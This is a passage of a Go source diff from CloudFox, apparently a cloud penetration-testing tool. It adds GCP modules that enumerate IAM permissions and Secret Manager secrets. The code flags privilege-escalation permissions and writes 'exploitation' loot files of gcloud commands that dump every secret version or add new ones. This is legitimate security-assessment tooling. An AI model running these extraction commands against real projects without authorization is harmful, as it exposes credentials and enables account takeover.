Enumerates group memberships using Cloud Identity API (when accessible) +- Expands permissions to include inherited permissions from group membership +- Identifies nested groups (groups that are members of other groups) +- Generates loot files for exploitation and further analysis + +This is a comprehensive permission enumeration - expect longer execution times for projects with many entities. +Note: Group membership enumeration requires Cloud Identity API access (cloudidentity.groups.readonly scope).`, + Run: runGCPPermissionsCommand, +} + +// High-privilege permission prefixes that should be flagged +var highPrivilegePermissionPrefixes = []string{ + "iam.serviceAccounts.actAs", + "iam.serviceAccounts.getAccessToken", + "iam.serviceAccounts.getOpenIdToken", + "iam.serviceAccounts.implicitDelegation", + "iam.serviceAccounts.signBlob", + "iam.serviceAccounts.signJwt", + "iam.serviceAccountKeys.create", + "iam.roles.create", + "iam.roles.update", + "resourcemanager.projects.setIamPolicy", + "resourcemanager.folders.setIamPolicy", + "resourcemanager.organizations.setIamPolicy", + "compute.instances.setMetadata", + "compute.instances.setServiceAccount", + "compute.projects.setCommonInstanceMetadata", + "storage.buckets.setIamPolicy", + "storage.objects.setIamPolicy", + "cloudfunctions.functions.setIamPolicy", + "run.services.setIamPolicy", + "secretmanager.secrets.setIamPolicy", + "deploymentmanager.deployments.create", + "cloudbuild.builds.create", + "container.clusters.getCredentials", + "orgpolicy.policy.set", +} + +// ------------------------------ +// Module Struct with embedded BaseGCPModule +// ------------------------------ +type PermissionsModule struct { + gcpinternal.BaseGCPModule + + // Module-specific fields + EntityPermissions []IAMService.EntityPermissions + GroupInfos []IAMService.GroupInfo + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +// ------------------------------ +// Output Struct implementing CloudfoxOutput interface +// ------------------------------ +type PermissionsOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o PermissionsOutput) TableFiles() []internal.TableFile { return o.Table } +func (o PermissionsOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPPermissionsCommand(cmd *cobra.Command, args []string) { + // Initialize command context + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_PERMISSIONS_MODULE_NAME) + if err != nil { + return // Error already logged + } + + // Create module instance + module := &PermissionsModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + EntityPermissions: []IAMService.EntityPermissions{}, + GroupInfos: []IAMService.GroupInfo{}, + LootMap: make(map[string]*internal.LootFile), + } + + // Initialize loot files + module.initializeLootFiles() + + // Execute enumeration + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *PermissionsModule) Execute(ctx context.Context, logger internal.Logger) { + logger.InfoM("Enumerating permissions for all entities with group expansion (this may take a while)...", globals.GCP_PERMISSIONS_MODULE_NAME) + + // Run enumeration with concurrency + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_PERMISSIONS_MODULE_NAME, m.processProject) + + // Check results + if len(m.EntityPermissions) == 0 { + logger.InfoM("No entity permissions found", globals.GCP_PERMISSIONS_MODULE_NAME) + return + } + + // Count total permissions and group membership stats + totalPerms := 0 + groupsEnumerated := 0 + for _, ep := range m.EntityPermissions { + totalPerms += ep.TotalPerms + } + for _, gi := range m.GroupInfos { + if gi.MembershipEnumerated { + groupsEnumerated++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d entity(ies) with %d total permission entries", + len(m.EntityPermissions), totalPerms), globals.GCP_PERMISSIONS_MODULE_NAME) + + if len(m.GroupInfos) > 0 { + logger.InfoM(fmt.Sprintf("Found %d group(s), enumerated membership for %d", len(m.GroupInfos), groupsEnumerated), globals.GCP_PERMISSIONS_MODULE_NAME) + + // Warn about blindspot if we couldn't enumerate some groups + unenumeratedGroups := len(m.GroupInfos) - groupsEnumerated + if unenumeratedGroups > 0 { + logger.InfoM(fmt.Sprintf("[WARNING] Could not enumerate membership for %d group(s) - permissions inherited via these groups are NOT visible!", unenumeratedGroups), globals.GCP_PERMISSIONS_MODULE_NAME) + logger.InfoM("[WARNING] Group members may have elevated privileges not shown in this output. Consider enabling Cloud Identity API access.", globals.GCP_PERMISSIONS_MODULE_NAME) + } + } + + // Write output + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor (called concurrently for each project) +// ------------------------------ +func (m *PermissionsModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating permissions in project: %s", projectID), globals.GCP_PERMISSIONS_MODULE_NAME) + } + + // Create service and fetch permissions with group expansion + iamService := IAMService.New() + entityPerms, groupInfos, err := iamService.GetAllEntityPermissionsWithGroupExpansion(projectID) + if err != nil { + m.CommandCounter.Error++ + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Error enumerating permissions in project %s: %v", projectID, err), globals.GCP_PERMISSIONS_MODULE_NAME) + } + return + } + + // Thread-safe append + m.mu.Lock() + m.EntityPermissions = append(m.EntityPermissions, entityPerms...) + m.GroupInfos = append(m.GroupInfos, groupInfos...) + + // Generate loot for each entity + for _, ep := range entityPerms { + m.addEntityToLoot(ep) + } + + // Generate loot for group memberships + for _, gi := range groupInfos { + m.addGroupToLoot(gi) + } + m.mu.Unlock() + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d entity(ies) with permissions in project %s", len(entityPerms), projectID), globals.GCP_PERMISSIONS_MODULE_NAME) + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *PermissionsModule) initializeLootFiles() { + m.LootMap["permissions-all"] = &internal.LootFile{ + Name: "permissions-all", + Contents: "# GCP Entity Permissions (All)\n# Generated by CloudFox\n# Format: Entity | Permission | Role | Inherited | Condition\n\n", + } + m.LootMap["permissions-high-privilege"] = &internal.LootFile{ + Name: "permissions-high-privilege", + Contents: "# GCP High-Privilege Permissions\n# Generated by CloudFox\n# These permissions can lead to privilege escalation\n\n", + } + m.LootMap["permissions-by-entity"] = &internal.LootFile{ + Name: "permissions-by-entity", + Contents: "# GCP Permissions Grouped by Entity\n# Generated by CloudFox\n\n", + } + m.LootMap["permissions-inherited"] = &internal.LootFile{ + Name: "permissions-inherited", + Contents: "# GCP Inherited Permissions\n# Generated by CloudFox\n# These permissions are inherited from folders or organization\n\n", + } + m.LootMap["permissions-conditional"] = &internal.LootFile{ + Name: "permissions-conditional", + Contents: "# GCP Conditional Permissions\n# Generated by CloudFox\n# These permissions have IAM conditions (conditional access)\n\n", + } + m.LootMap["group-memberships"] = &internal.LootFile{ + Name: "group-memberships", + Contents: "# GCP Group Memberships\n# Generated by CloudFox\n# Shows group members including nested groups\n\n", + } + m.LootMap["groups-unenumerated"] = &internal.LootFile{ + Name: "groups-unenumerated", + Contents: "# GCP Groups - Membership NOT Enumerated (BLINDSPOT)\n# Generated by CloudFox\n# These groups have IAM permissions but membership could not be enumerated\n# Members of these groups inherit permissions that are NOT visible in other output\n# Requires Cloud Identity API access to enumerate\n\n", + } +} + +func (m *PermissionsModule) addEntityToLoot(ep IAMService.EntityPermissions) { + // Permissions by entity + m.LootMap["permissions-by-entity"].Contents += fmt.Sprintf( + "# Entity: %s (Type: %s)\n"+ + "# Project: %s\n"+ + "# Roles: %s\n"+ + "# Total Permissions: %d (Unique: %d)\n", + ep.Email, ep.EntityType, + ep.ProjectID, + strings.Join(ep.Roles, ", "), + ep.TotalPerms, ep.UniquePerms, + ) + + // Sort permissions for consistent output + sortedPerms := make([]IAMService.PermissionEntry, len(ep.Permissions)) + copy(sortedPerms, ep.Permissions) + sort.Slice(sortedPerms, func(i, j int) bool { + return sortedPerms[i].Permission < sortedPerms[j].Permission + }) + + for _, perm := range sortedPerms { + inherited := "" + if perm.IsInherited { + inherited = fmt.Sprintf(" [inherited from %s]", perm.InheritedFrom) + } + condition := "" + if perm.HasCondition { + condition = fmt.Sprintf(" [condition: %s]", perm.Condition) + } + + m.LootMap["permissions-by-entity"].Contents += fmt.Sprintf( + " %s (via %s)%s%s\n", + perm.Permission, perm.Role, inherited, condition, + ) + + // All permissions + m.LootMap["permissions-all"].Contents += fmt.Sprintf( + "%s | %s | %s | %v | %s\n", + ep.Email, perm.Permission, perm.Role, perm.IsInherited, perm.Condition, + ) + + // High privilege permissions + if isHighPrivilegePermission(perm.Permission) { + m.LootMap["permissions-high-privilege"].Contents += fmt.Sprintf( + "# Entity: %s (Type: %s)\n"+ + "# Permission: %s\n"+ + "# Role: %s (%s)\n"+ + "# Resource: %s/%s%s%s\n\n", + ep.Email, ep.EntityType, + perm.Permission, + perm.Role, perm.RoleType, + perm.ResourceType, perm.ResourceID, inherited, condition, + ) + } + + // Inherited permissions + if perm.IsInherited { + m.LootMap["permissions-inherited"].Contents += fmt.Sprintf( + "%s | %s | %s | %s\n", + ep.Email, perm.Permission, perm.Role, perm.InheritedFrom, + ) + } + + // Conditional permissions + if perm.HasCondition { + m.LootMap["permissions-conditional"].Contents += fmt.Sprintf( + "%s | %s | %s | %s\n", + ep.Email, perm.Permission, perm.Role, perm.Condition, + ) + } + } + m.LootMap["permissions-by-entity"].Contents += "\n" +} + +// addGroupToLoot adds group membership information to loot files +func (m *PermissionsModule) addGroupToLoot(gi IAMService.GroupInfo) { + enumStatus := "not enumerated" + if gi.MembershipEnumerated { + enumStatus = "enumerated" + } + + m.LootMap["group-memberships"].Contents += fmt.Sprintf( + "# Group: %s\n"+ + "# Display Name: %s\n"+ + "# Project: %s\n"+ + "# Member Count: %d\n"+ + "# Has Nested Groups: %v\n"+ + "# Membership Status: %s\n"+ + "# Roles: %s\n", + gi.Email, + gi.DisplayName, + gi.ProjectID, + gi.MemberCount, + gi.HasNestedGroups, + enumStatus, + strings.Join(gi.Roles, ", "), + ) + + if gi.MembershipEnumerated && len(gi.Members) > 0 { + m.LootMap["group-memberships"].Contents += "# Members:\n" + for _, member := range gi.Members { + m.LootMap["group-memberships"].Contents += fmt.Sprintf( + " - %s (Type: %s, Role: %s)\n", + member.Email, member.Type, member.Role, + ) + } + } + + if gi.HasNestedGroups && len(gi.NestedGroups) > 0 { + m.LootMap["group-memberships"].Contents += "# Nested Groups:\n" + for _, nested := range gi.NestedGroups { + m.LootMap["group-memberships"].Contents += fmt.Sprintf(" - %s\n", nested) + } + } + + m.LootMap["group-memberships"].Contents += "\n" + + // Track unenumerated groups as a blindspot + if !gi.MembershipEnumerated { + m.LootMap["groups-unenumerated"].Contents += fmt.Sprintf( + "# BLINDSPOT: Group %s\n"+ + "# Project: %s\n"+ + "# Roles assigned to this group: %s\n"+ + "# Members of this group inherit these roles but are NOT visible!\n\n", + gi.Email, + gi.ProjectID, + strings.Join(gi.Roles, ", "), + ) + } +} + +// isHighPrivilegePermission checks if a permission is considered high-privilege +func isHighPrivilegePermission(permission string) bool { + for _, prefix := range highPrivilegePermissionPrefixes { + if strings.HasPrefix(permission, prefix) { + return true + } + } + return false +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *PermissionsModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Entity summary table + summaryHeader := []string{ + "Entity", + "Type", + "Roles", + "Total Perms", + "Unique Perms", + "High Priv", + "Inherited", + "Conditional", + "Project", + } + + var summaryBody [][]string + highPrivEntities := 0 + for _, ep := range m.EntityPermissions { + highPrivCount := 0 + inheritedCount := 0 + conditionalCount := 0 + for _, perm := range ep.Permissions { + if isHighPrivilegePermission(perm.Permission) { + highPrivCount++ + } + if perm.IsInherited { + inheritedCount++ + } + if perm.HasCondition { + conditionalCount++ + } + } + + if highPrivCount > 0 { + highPrivEntities++ + } + + summaryBody = append(summaryBody, []string{ + ep.Email, + ep.EntityType, + fmt.Sprintf("%d", len(ep.Roles)), + fmt.Sprintf("%d", ep.TotalPerms), + fmt.Sprintf("%d", ep.UniquePerms), + fmt.Sprintf("%d", highPrivCount), + fmt.Sprintf("%d", inheritedCount), + fmt.Sprintf("%d", conditionalCount), + ep.ProjectID, + }) + } + + // Detailed permissions table (one row per permission) + detailHeader := []string{ + "Entity", + "Type", + "Permission", + "Role", + "Role Type", + "Inherited", + "Source", + "Condition", + "Project", + } + + var detailBody [][]string + for _, ep := range m.EntityPermissions { + for _, perm := range ep.Permissions { + inherited := "" + source := perm.ResourceType + if perm.IsInherited { + inherited = "✓" + source = perm.InheritedFrom + } + + condition := "" + if perm.HasCondition { + condition = perm.Condition + } + + detailBody = append(detailBody, []string{ + ep.Email, + ep.EntityType, + perm.Permission, + perm.Role, + perm.RoleType, + inherited, + source, + condition, + perm.ResourceID, + }) + } + } + + // High privilege permissions table + highPrivHeader := []string{ + "Entity", + "Type", + "Permission", + "Role", + "Inherited", + "Condition", + "Project", + } + + var highPrivBody [][]string + for _, ep := range m.EntityPermissions { + for _, perm := range ep.Permissions { + if isHighPrivilegePermission(perm.Permission) { + inherited := "" + if perm.IsInherited { + inherited = perm.InheritedFrom + } + condition := "" + if perm.HasCondition { + condition = perm.Condition + } + + highPrivBody = append(highPrivBody, []string{ + ep.Email, + ep.EntityType, + perm.Permission, + perm.Role, + inherited, + condition, + perm.ResourceID, + }) + } + } + } + + // Group membership table + groupHeader := []string{ + "Group Email", + "Display Name", + "Member Count", + "Nested Groups", + "Enumerated", + "Roles", + "Project", + } + + var groupBody [][]string + for _, gi := range m.GroupInfos { + enumStatus := "No" + if gi.MembershipEnumerated { + enumStatus = "Yes" + } + nestedGroups := "" + if gi.HasNestedGroups { + nestedGroups = fmt.Sprintf("%d", len(gi.NestedGroups)) + } + + groupBody = append(groupBody, []string{ + gi.Email, + gi.DisplayName, + fmt.Sprintf("%d", gi.MemberCount), + nestedGroups, + enumStatus, + fmt.Sprintf("%d", len(gi.Roles)), + gi.ProjectID, + }) + } + + // Group members detail table + groupMembersHeader := []string{ + "Group Email", + "Member Email", + "Member Type", + "Role in Group", + "Project", + } + + var groupMembersBody [][]string + for _, gi := range m.GroupInfos { + if gi.MembershipEnumerated { + for _, member := range gi.Members { + groupMembersBody = append(groupMembersBody, []string{ + gi.Email, + member.Email, + member.Type, + member.Role, + gi.ProjectID, + }) + } + } + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + // Build tables + tables := []internal.TableFile{ + { + Name: "permissions-summary", + Header: summaryHeader, + Body: summaryBody, + }, + } + + // Add high privilege table if there are any + if len(highPrivBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "permissions-high-privilege", + Header: highPrivHeader, + Body: highPrivBody, + }) + logger.InfoM(fmt.Sprintf("[FINDING] Found %d entity(ies) with high-privilege permissions!", highPrivEntities), globals.GCP_PERMISSIONS_MODULE_NAME) + } + + // Add detailed table (can be large) + if len(detailBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "permissions-detail", + Header: detailHeader, + Body: detailBody, + }) + } + + // Add group summary table if there are any groups + if len(groupBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "permissions-groups", + Header: groupHeader, + Body: groupBody, + }) + } + + // Add group members detail table if there are enumerated members + if len(groupMembersBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "permissions-group-members", + Header: groupMembersHeader, + Body: groupMembersBody, + }) + } + + output := PermissionsOutput{ + Table: tables, + Loot: lootFiles, + } + + // Write output using HandleOutputSmart with scope support + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", // scopeType + m.ProjectIDs, // scopeIdentifiers + m.ProjectIDs, // scopeNames (same as IDs for GCP projects) + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_PERMISSIONS_MODULE_NAME) + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/secrets.go b/gcp/commands/secrets.go index f5c691c2..b6375280 100644 --- a/gcp/commands/secrets.go +++ b/gcp/commands/secrets.go @@ -1,120 +1,399 @@ package commands import ( + "context" "fmt" + "strings" + "sync" secretmanager "cloud.google.com/go/secretmanager/apiv1" SecretsService "github.com/BishopFox/cloudfox/gcp/services/secretsService" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" "github.com/BishopFox/cloudfox/globals" - "github.com/BishopFox/cloudfox/internal" "github.com/spf13/cobra" ) var GCPSecretsCommand = &cobra.Command{ Use: globals.GCP_SECRETS_MODULE_NAME, - Aliases: []string{}, - Short: "Display GCP secrets information", - Args: cobra.MinimumNArgs(0), - Long: ` -Display available secrets information: -cloudfox gcp secrets`, + Aliases: []string{"secretmanager", "sm"}, + Short: "Enumerate GCP Secret Manager secrets with security configuration", + Long: `Enumerate GCP Secret Manager secrets across projects with security-relevant details. + +Features: +- Lists all secrets with metadata and security configuration +- Shows encryption type (Google-managed vs CMEK) +- Shows replication configuration (automatic vs user-managed) +- Shows expiration and rotation settings +- Enumerates IAM policies per secret +- Generates gcloud commands for secret access +- Generates exploitation commands for secret extraction + +Security Columns: +- Encryption: "Google-managed" or "CMEK" (customer-managed keys) +- Replication: "automatic" or "user-managed" with locations +- Rotation: Whether automatic rotation is enabled +- Expiration: Whether the secret has an expiration time/TTL +- VersionDestroyTTL: Delayed destruction period for old versions`, Run: runGCPSecretsCommand, } -// GCPSecretsResults struct that implements the internal.OutputInterface -type GCPSecretsResults struct { - Data []SecretsService.SecretInfo +// ------------------------------ +// Module Struct with embedded BaseGCPModule +// ------------------------------ +type SecretsModule struct { + gcpinternal.BaseGCPModule + + // Module-specific fields + Secrets []SecretsService.SecretInfo + LootMap map[string]*internal.LootFile + client *secretmanager.Client + mu sync.Mutex } -func (g GCPSecretsResults) TableFiles() []internal.TableFile { - var tableFiles []internal.TableFile +// ------------------------------ +// Output Struct implementing CloudfoxOutput interface +// ------------------------------ +type SecretsOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} - header := []string{ - "Name", - "CreationTime", - "Labels", - "Rotation", - "ProjectID", - // Add more fields as necessary +func (o SecretsOutput) TableFiles() []internal.TableFile { return o.Table } +func (o SecretsOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPSecretsCommand(cmd *cobra.Command, args []string) { + // Initialize command context + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_SECRETS_MODULE_NAME) + if err != nil { + return // Error already logged } - var body [][]string - for _, value := range g.Data { - body = append(body, []string{ - value.Name, - value.CreationTime, - fmt.Sprintf("%v", value.Labels), - value.Rotation, - value.ProjectID, - }) + // Create Secret Manager client + client, err := secretmanager.NewClient(cmdCtx.Ctx) + if err != nil { + cmdCtx.Logger.ErrorM(fmt.Sprintf("Failed to create Secret Manager client: %v", err), globals.GCP_SECRETS_MODULE_NAME) + return } + defer client.Close() - tableFile := internal.TableFile{ - Header: header, - Body: body, - Name: globals.GCP_SECRETS_MODULE_NAME, + // Create module instance + module := &SecretsModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Secrets: []SecretsService.SecretInfo{}, + LootMap: make(map[string]*internal.LootFile), + client: client, } - tableFiles = append(tableFiles, tableFile) - return tableFiles -} + // Initialize loot files + module.initializeLootFiles() -func (g GCPSecretsResults) LootFiles() []internal.LootFile { - // Define any specific data considered as loot - return []internal.LootFile{} + // Execute enumeration + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) } -func runGCPSecretsCommand(cmd *cobra.Command, args []string) { - var projectIDs []string - var account string - parentCmd := cmd.Parent() - ctx := cmd.Context() - logger := internal.NewLogger() - if value, ok := ctx.Value("projectIDs").([]string); ok && len(value) > 0 { - projectIDs = value - } else { - logger.ErrorM("Could not retrieve projectIDs from flag value or value is empty", globals.GCP_SECRETS_MODULE_NAME) +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *SecretsModule) Execute(ctx context.Context, logger internal.Logger) { + // Run enumeration with concurrency + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_SECRETS_MODULE_NAME, m.processProject) + + // Check results + if len(m.Secrets) == 0 { + logger.InfoM("No secrets found", globals.GCP_SECRETS_MODULE_NAME) return } - if value, ok := ctx.Value("account").(string); ok { - account = value - } else { - logger.ErrorM("Could not retrieve account email from command", globals.GCP_IAM_MODULE_NAME) + logger.SuccessM(fmt.Sprintf("Found %d secret(s)", len(m.Secrets)), globals.GCP_SECRETS_MODULE_NAME) + + // Write output + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor (called concurrently for each project) +// ------------------------------ +func (m *SecretsModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating secrets in project: %s", projectID), globals.GCP_SECRETS_MODULE_NAME) } - client, err := secretmanager.NewClient(ctx) + // Create service and fetch secrets + ss := SecretsService.New(m.client) + secrets, err := ss.Secrets(projectID) if err != nil { - logger.ErrorM(fmt.Sprintf("failed to create secret manager client: %v", err), globals.GCP_SECRETS_MODULE_NAME) + m.CommandCounter.Error++ + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Error enumerating secrets in project %s: %v", projectID, err), globals.GCP_SECRETS_MODULE_NAME) + } return } - defer client.Close() - ss := SecretsService.New(client) - var results []SecretsService.SecretInfo - - // Set output params from parentCmd - verbosity, _ := parentCmd.PersistentFlags().GetInt("verbosity") - wrap, _ := parentCmd.PersistentFlags().GetBool("wrap") - outputDirectory, _ := parentCmd.PersistentFlags().GetString("outdir") - format, _ := parentCmd.PersistentFlags().GetString("output") - - for _, projectID := range projectIDs { - logger.InfoM(fmt.Sprintf("Retrieving all secrets from project: %s", projectID), globals.GCP_SECRETS_MODULE_NAME) - result, err := ss.Secrets(projectID) - if err != nil { - logger.ErrorM(err.Error(), globals.GCP_SECRETS_MODULE_NAME) - return + // Thread-safe append + m.mu.Lock() + m.Secrets = append(m.Secrets, secrets...) + + // Generate loot for each secret + for _, secret := range secrets { + m.addSecretToLoot(secret) + } + m.mu.Unlock() + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d secret(s) in project %s", len(secrets), projectID), globals.GCP_SECRETS_MODULE_NAME) + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *SecretsModule) initializeLootFiles() { + m.LootMap["secrets-gcloud-commands"] = &internal.LootFile{ + Name: "secrets-gcloud-commands", + Contents: "# GCP Secret Manager Commands\n# Generated by CloudFox\n\n", + } + m.LootMap["secrets-access-commands"] = &internal.LootFile{ + Name: "secrets-access-commands", + Contents: "# GCP Secret Access Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + m.LootMap["secrets-exploitation"] = &internal.LootFile{ + Name: "secrets-exploitation", + Contents: "# GCP Secret Extraction Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + m.LootMap["secrets-iam-bindings"] = &internal.LootFile{ + Name: "secrets-iam-bindings", + Contents: "# GCP Secret IAM Bindings\n# Generated by CloudFox\n\n", + } +} + +func (m *SecretsModule) addSecretToLoot(secret SecretsService.SecretInfo) { + // Extract secret name from full path + secretName := getSecretShortName(secret.Name) + + // gcloud commands for enumeration + m.LootMap["secrets-gcloud-commands"].Contents += fmt.Sprintf( + "# Secret: %s (Project: %s)\n"+ + "# Encryption: %s, Replication: %s, Rotation: %s\n"+ + "gcloud secrets describe %s --project=%s\n"+ + "gcloud secrets versions list %s --project=%s\n"+ + "gcloud secrets get-iam-policy %s --project=%s\n\n", + secretName, secret.ProjectID, + secret.EncryptionType, secret.ReplicationType, secret.Rotation, + secretName, secret.ProjectID, + secretName, secret.ProjectID, + secretName, secret.ProjectID, + ) + + // Secret access commands + m.LootMap["secrets-access-commands"].Contents += fmt.Sprintf( + "# Secret: %s\n"+ + "# Access latest version:\n"+ + "gcloud secrets versions access latest --secret=%s --project=%s\n"+ + "# Access specific version:\n"+ + "gcloud secrets versions access 1 --secret=%s --project=%s\n\n", + secretName, + secretName, secret.ProjectID, + secretName, secret.ProjectID, + ) + + // Exploitation commands + m.LootMap["secrets-exploitation"].Contents += fmt.Sprintf( + "# Secret: %s (Project: %s)\n"+ + "# Download all versions:\n"+ + "for v in $(gcloud secrets versions list %s --project=%s --format='value(name)'); do\n"+ + " echo \"=== Version $v ===\"\n"+ + " gcloud secrets versions access $v --secret=%s --project=%s\n"+ + "done\n\n"+ + "# Add a new version (requires write access):\n"+ + "echo -n 'new-secret-value' | gcloud secrets versions add %s --project=%s --data-file=-\n\n", + secretName, secret.ProjectID, + secretName, secret.ProjectID, + secretName, secret.ProjectID, + secretName, secret.ProjectID, + ) + + // IAM bindings + if len(secret.IAMBindings) > 0 { + m.LootMap["secrets-iam-bindings"].Contents += fmt.Sprintf( + "# Secret: %s (Project: %s)\n", + secretName, secret.ProjectID, + ) + for _, binding := range secret.IAMBindings { + m.LootMap["secrets-iam-bindings"].Contents += fmt.Sprintf( + "# Role: %s\n# Members: %s\n", + binding.Role, + strings.Join(binding.Members, ", "), + ) } - results = append(results, result...) - logger.InfoM(fmt.Sprintf("Done retrieving all secrets from project: %s", projectID), globals.GCP_SECRETS_MODULE_NAME) - cloudfoxOutput := GCPSecretsResults{Data: results} - err = internal.HandleOutput("gcp", format, outputDirectory, verbosity, wrap, globals.GCP_SECRETS_MODULE_NAME, account, projectID, cloudfoxOutput) - if err != nil { - logger.ErrorM(err.Error(), globals.GCP_SECRETS_MODULE_NAME) - return + m.LootMap["secrets-iam-bindings"].Contents += "\n" + } +} + +// ------------------------------ +// Helper functions +// ------------------------------ + +// getSecretShortName extracts the short name from a full secret resource path +func getSecretShortName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullName +} + +// getSecretMemberType extracts the member type from a GCP IAM member string +func getSecretMemberType(member string) string { + switch { + case member == "allUsers": + return "PUBLIC" + case member == "allAuthenticatedUsers": + return "ALL_AUTHENTICATED" + case strings.HasPrefix(member, "user:"): + return "User" + case strings.HasPrefix(member, "serviceAccount:"): + return "ServiceAccount" + case strings.HasPrefix(member, "group:"): + return "Group" + case strings.HasPrefix(member, "domain:"): + return "Domain" + case strings.HasPrefix(member, "projectOwner:"): + return "ProjectOwner" + case strings.HasPrefix(member, "projectEditor:"): + return "ProjectEditor" + case strings.HasPrefix(member, "projectViewer:"): + return "ProjectViewer" + case strings.HasPrefix(member, "deleted:"): + return "Deleted" + default: + return "Unknown" + } +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *SecretsModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Main table with security-relevant columns + header := []string{ + "Project ID", + "Name", + "Encryption", + "Replication", + "Rotation", + "Expiration", + "VersionDestroyTTL", + "Created", + } + + var body [][]string + for _, secret := range m.Secrets { + secretName := getSecretShortName(secret.Name) + + // Format expiration + expiration := "-" + if secret.HasExpiration { + if secret.ExpireTime != "" { + expiration = secret.ExpireTime + } else if secret.TTL != "" { + expiration = "TTL: " + secret.TTL + } + } + + // Format version destroy TTL + versionDestroyTTL := "-" + if secret.VersionDestroyTTL != "" { + versionDestroyTTL = secret.VersionDestroyTTL + } + + body = append(body, []string{ + secret.ProjectID, + secretName, + secret.EncryptionType, + secret.ReplicationType, + secret.Rotation, + expiration, + versionDestroyTTL, + secret.CreationTime, + }) + } + + // Detailed IAM table - one row per member + iamHeader := []string{ + "Secret", + "Project ID", + "Role", + "Member Type", + "Member", + } + + var iamBody [][]string + for _, secret := range m.Secrets { + secretName := getSecretShortName(secret.Name) + for _, binding := range secret.IAMBindings { + for _, member := range binding.Members { + memberType := getSecretMemberType(member) + iamBody = append(iamBody, []string{ + secretName, + secret.ProjectID, + binding.Role, + memberType, + member, + }) + } + } + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) } - logger.InfoM(fmt.Sprintf("Done writing output for project %s", projectID), globals.GCP_SECRETS_MODULE_NAME) + } + + // Build table files + tableFiles := []internal.TableFile{ + { + Name: globals.GCP_SECRETS_MODULE_NAME, + Header: header, + Body: body, + }, + } + + // Add IAM table if there are bindings + if len(iamBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "secrets-iam", + Header: iamHeader, + Body: iamBody, + }) + } + + output := SecretsOutput{ + Table: tableFiles, + Loot: lootFiles, + } + + // Write output using HandleOutputSmart with scope support + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", // scopeType + m.ProjectIDs, // scopeIdentifiers + m.ProjectIDs, // scopeNames (same as IDs for GCP projects) + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_SECRETS_MODULE_NAME) + m.CommandCounter.Error++ } } diff --git a/gcp/sdk/cache.go b/gcp/sdk/cache.go new file mode 100644 index 00000000..339525fa --- /dev/null +++ b/gcp/sdk/cache.go @@ -0,0 +1,60 @@ +package sdk + +import ( + "strings" + "time" + + "github.com/patrickmn/go-cache" +) + +// GCPSDKCache is the centralized cache for all GCP SDK calls +// Uses the same caching library as AWS and Azure (github.com/patrickmn/go-cache) +// Default expiration: 2 hours, cleanup interval: 10 minutes +var GCPSDKCache = cache.New(2*time.Hour, 10*time.Minute) + +// CacheKey generates a consistent cache key from components +// Example: CacheKey("buckets", "my-project") -> "buckets-my-project" +func CacheKey(parts ...string) string { + return strings.Join(parts, "-") +} + +// ClearCache 